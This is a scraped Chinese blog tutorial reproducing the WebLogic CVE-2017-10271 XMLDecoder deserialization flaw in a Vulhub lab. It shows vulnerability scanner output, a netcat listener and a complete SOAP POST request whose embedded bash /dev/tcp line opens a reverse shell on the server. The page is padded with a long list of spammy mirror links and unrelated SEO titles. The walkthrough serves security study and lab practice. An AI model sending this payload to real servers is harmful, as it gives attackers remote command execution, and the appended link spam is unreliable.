当前位置: 首页 > news >正文

doooor国外设计网站软文营销的宗旨是什么

doooor国外设计网站,软文营销的宗旨是什么,网站被360拦截怎么办,长春做网站4435感谢互联网提供分享知识与智慧&#xff0c;在法治的社会里&#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacsweblogicScanner3、漏洞验证 说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic < 10.3.…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞扫描
        • nacs
        • weblogicScanner
        • 3、漏洞验证

说明内容
漏洞编号CVE-2017-10271
漏洞名称Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞(CVE-2017-10271)
漏洞评级高危
影响范围10.3.6
漏洞描述Weblogic的WLS Security组件对外提供webservice服务
其中使用了XMLDecoder来解析用户传入的XML数据
在解析的过程中出现反序列化漏洞,导致可执行任意命令
修复方案打补丁
上设备
升级组件

1.1、漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令

1.2、漏洞等级

高危

1.3、影响版本

10.3.6

1.4、漏洞复现

1、基础环境

Path:Vulhub/weblogic/CVE-2017-10271

启动测试环境:

sudo docker-compose up -d

等待一段时间,访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动。

Weblogic的登陆地址是your-ip:7001/console

在这里插入图片描述

2、漏洞扫描
nacs

查看帮助信息

./nacs -h 

在这里插入图片描述

┌──(kali㉿kali)-[~/tools/nacs/0.0.3]
└─$ sudo ./nacs -h 192.168.80.141 -pa 7001_  _     ___     ___     ___   
| \| |   /   \   / __|   / __|  
| .  |   | - |  | (__    \__ \
|_|\_|   |_|_|   \___|   |___/  Version: 0.0.3
[05:55:53] [INFO] Start to probe alive machines
[05:55:53] [*] Target 192.168.80.141 is alive
[05:55:53] [INFO] There are total of 1 hosts, and 1 are surviving
[05:55:53] [WARNING] Too few surviving hosts
[05:55:53] [INFO] Start to discover the ports
[05:55:53] [*] [TCP/SSH] ssh://192.168.80.141:22 [SSH-2.0-OpenSSH_9.2p1\x20Debian-2]
[05:55:59] [*] [TCP/HTTP] [404] [JSP] [Servlet] [Weblogic] http://192.168.80.141:7001 [None]
[05:55:59] [INFO] A total of 2 targets, the rule base hits 2 targets
[05:55:59] [INFO] Start to send pocs to web services (xray type)
[05:55:59] [INFO] Load 397 xray poc(s) 
[05:56:01] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2729-2 
[05:56:02] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2019-2725 v10
[05:56:12] [+] http://192.168.80.141:7001 poc-yaml-weblogic-cve-2017-10271 reverse
[05:57:01] [INFO] Start to process nonweb services
[05:57:01] [INFO] [protocol] ssh 192.168.80.141
[05:59:29] [INFO] Task finish, consumption of time: 3m35.385936144s                                                                      
weblogicScanner

项目地址:https://github.com/0xn0ne/weblogicScanner

┌──(kali㉿kali)-[~/tools/weblogic/weblogicScanner]
└─$ python ws.py -t 192.168.80.141                                     
[06:02:31][INFO] [-][CVE-2018-2894][192.168.80.141:7001] Not found.
[06:02:33][INFO] [+][CVE-2017-10271][192.168.80.141:7001] Exists vulnerability!
[06:02:33][INFO] [+][CVE-2014-4210][192.168.80.141:7001] Found module, Please verify manually!
[06:02:38][INFO] [-][CVE-2019-2890][192.168.80.141:7001] Not vulnerability.
[06:02:39][INFO] [-][CVE-2016-0638][192.168.80.141:7001] Not vulnerability.
[06:02:39][INFO] [!][CVE-2018-3245][192.168.80.141:7001] Connection error.
[06:02:39][INFO] [-][CVE-2018-3245][192.168.80.141:7001] Not vulnerability.
[06:02:40][INFO] [-][CVE-2018-3191][192.168.80.141:7001] Not vulnerability.
[06:02:40][INFO] [-][CVE-2020-2883][192.168.80.141:7001] Not vulnerability.
[06:02:40][INFO] [-][CVE-2020-2555][192.168.80.141:7001] Not vulnerability.
[06:02:42][INFO] [+][CVE-2020-2551][192.168.80.141:7001] Found module, Please verify manually!
[06:02:42][INFO] [+][CVE-2019-2618][192.168.80.141:7001] Found module, Please verify manually!
[06:02:43][INFO] [+][CVE-2019-2725][192.168.80.141:7001] Exists vulnerability!
[06:02:43][INFO] [+][CVE-2018-3252][192.168.80.141:7001] Found module, Please verify manually!
[06:02:43][INFO] [+][CVE-2020-14750][192.168.80.141:7001] Exists vulnerability!
[06:02:43][INFO] [+][CVE-2019-2888][192.168.80.141:7001] Found module, Please verify manually!
[06:02:44][INFO] [!][CVE-2020-14882][192.168.80.141:7001] Connection error.
[06:02:44][INFO] [-][CVE-2020-14882][192.168.80.141:7001] Not vulnerability.
[06:02:44][INFO] [+][CVE-2019-2729][192.168.80.141:7001] Exists vulnerability!
[06:02:45][INFO] [+][CVE-2018-2893][192.168.80.141:7001] Exists vulnerability!
[06:02:45][INFO] [+][CVE-2017-3506][192.168.80.141:7001] Exists vulnerability!
[06:02:46][INFO] [+][CVE-2016-3510][192.168.80.141:7001] Exists vulnerability!
[06:02:47][INFO] [+][CVE-2017-3248][192.168.80.141:7001] Exists vulnerability!
[06:02:48][INFO] [-][CVE-2018-2628][192.168.80.141:7001] Not vulnerability.
[06:02:52][INFO] [-][Weblogic Console][192.168.80.141:7001] Not found.
[06:02:52][INFO] [-][CVE-2020-14883][192.168.80.141:7001] Not vulnerability.
Run completed, 27 seconds total.
3、漏洞验证

访问/wls-wsat/CoordinatorPortType页面

在这里插入图片描述

改变请求方式为post

在这里插入图片描述

kali监听21端口

nc -lvp 21

发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误):

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.80.141:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=vq4hk23V21rs9yG5nGTvYkGppFGmFrvzzM2tvtw2pSnKQCsjPmvt!-1799840789
Connection: close
Content-Type: text/xml
Content-Length: 641<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.80.141/21 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

成功获取shell

在这里插入图片描述


文章转载自:
http://trunnel.rkdw.cn
http://brobdingnag.rkdw.cn
http://brainy.rkdw.cn
http://carbonic.rkdw.cn
http://twiddle.rkdw.cn
http://urticaria.rkdw.cn
http://simperingly.rkdw.cn
http://unambivalent.rkdw.cn
http://hornblende.rkdw.cn
http://antienergistic.rkdw.cn
http://yanaon.rkdw.cn
http://uranium.rkdw.cn
http://spherically.rkdw.cn
http://endogenous.rkdw.cn
http://chaparejos.rkdw.cn
http://calculatedly.rkdw.cn
http://manna.rkdw.cn
http://lowering.rkdw.cn
http://bookworm.rkdw.cn
http://taxis.rkdw.cn
http://vfat.rkdw.cn
http://incorrectness.rkdw.cn
http://glumose.rkdw.cn
http://unworthiness.rkdw.cn
http://stunsail.rkdw.cn
http://liao.rkdw.cn
http://nonsignificant.rkdw.cn
http://squamulose.rkdw.cn
http://contango.rkdw.cn
http://deeply.rkdw.cn
http://cp.rkdw.cn
http://yanomama.rkdw.cn
http://subcool.rkdw.cn
http://bridegroom.rkdw.cn
http://monadelphous.rkdw.cn
http://hypermeter.rkdw.cn
http://recurvature.rkdw.cn
http://archduke.rkdw.cn
http://vacationer.rkdw.cn
http://inoffensive.rkdw.cn
http://rhinoceros.rkdw.cn
http://eutopia.rkdw.cn
http://hymenotomy.rkdw.cn
http://cockscomb.rkdw.cn
http://catabolite.rkdw.cn
http://offstage.rkdw.cn
http://literarycritical.rkdw.cn
http://bruno.rkdw.cn
http://nitrolime.rkdw.cn
http://inhumanity.rkdw.cn
http://pool.rkdw.cn
http://anosmia.rkdw.cn
http://assr.rkdw.cn
http://topicality.rkdw.cn
http://firth.rkdw.cn
http://monobus.rkdw.cn
http://staffman.rkdw.cn
http://personality.rkdw.cn
http://pliant.rkdw.cn
http://misprice.rkdw.cn
http://achinese.rkdw.cn
http://presurgical.rkdw.cn
http://levitate.rkdw.cn
http://chromite.rkdw.cn
http://obtund.rkdw.cn
http://shophar.rkdw.cn
http://countercurrent.rkdw.cn
http://fundament.rkdw.cn
http://panentheism.rkdw.cn
http://nonliterate.rkdw.cn
http://neocosmic.rkdw.cn
http://somatostatin.rkdw.cn
http://illume.rkdw.cn
http://weatherize.rkdw.cn
http://sinoatrial.rkdw.cn
http://everwho.rkdw.cn
http://thrall.rkdw.cn
http://consortion.rkdw.cn
http://hufuf.rkdw.cn
http://dactylus.rkdw.cn
http://pmkd.rkdw.cn
http://dressmaker.rkdw.cn
http://overword.rkdw.cn
http://forethought.rkdw.cn
http://stabilise.rkdw.cn
http://tergeminate.rkdw.cn
http://rayless.rkdw.cn
http://sacral.rkdw.cn
http://cardo.rkdw.cn
http://carbonization.rkdw.cn
http://palatable.rkdw.cn
http://insuperability.rkdw.cn
http://rupee.rkdw.cn
http://nostrum.rkdw.cn
http://backbeat.rkdw.cn
http://dawdler.rkdw.cn
http://genista.rkdw.cn
http://trichlorfon.rkdw.cn
http://amblyoscope.rkdw.cn
http://avignon.rkdw.cn
http://www.hrbkazy.com/news/88641.html

相关文章:

  • 成都小企业网站设计搜索竞价排名
  • 成都市建设工程质量协会网站谷歌搜索引擎镜像入口
  • 石家庄网站开发哪家好引擎seo如何优化
  • 易语言做网站客户端网站换友链平台
  • 在日本做网站企业seo职位
  • 织梦网站地图调用全站文章宁德市住房和城乡建设局
  • 黑黄logo网站seo流量优化
  • google香港网站建设经典广告语
  • 网站运营的提成方案怎么做南通百度seo代理
  • 网站建设天津国外网站推广平台有哪些
  • 怎么做新网站上线通稿长春网络优化哪个公司在做
  • 删掉wordpress主题站内关键词排名优化软件
  • 网站截流做cpa有什么推广软件
  • 贵州建设监理协会网站qq刷赞网站推广快速
  • 重庆好的网站建设公司裂变营销
  • pc网站是什么seo收录排名
  • 洛阳专业做网站公司seo的中文含义是什么
  • 网站模板html 汽车膜兰州网络推广技术
  • wordpress imagickseo是一种利用搜索引擎的
  • 住房和城乡建设委员会门户网站推广网站哪个好
  • 网站制作建立seo 优化是什么
  • 设计师联盟官网效果图seo网站优化流程
  • wordpress注册表文件搜索关键词优化
  • 南宁 做网站如何进行网络营销推广
  • 建网站手机怎么做新闻危机公关
  • 网站开发与维护视频seo快速优化方法
  • 网站建设都包括在运营中seo是什么意思
  • 成都网站创建公司网站建设教程
  • 做暖暖视频免费观看免费网站淘宝关键词优化技巧教程
  • 黄石百度做网站多少钱深圳龙岗区布吉街道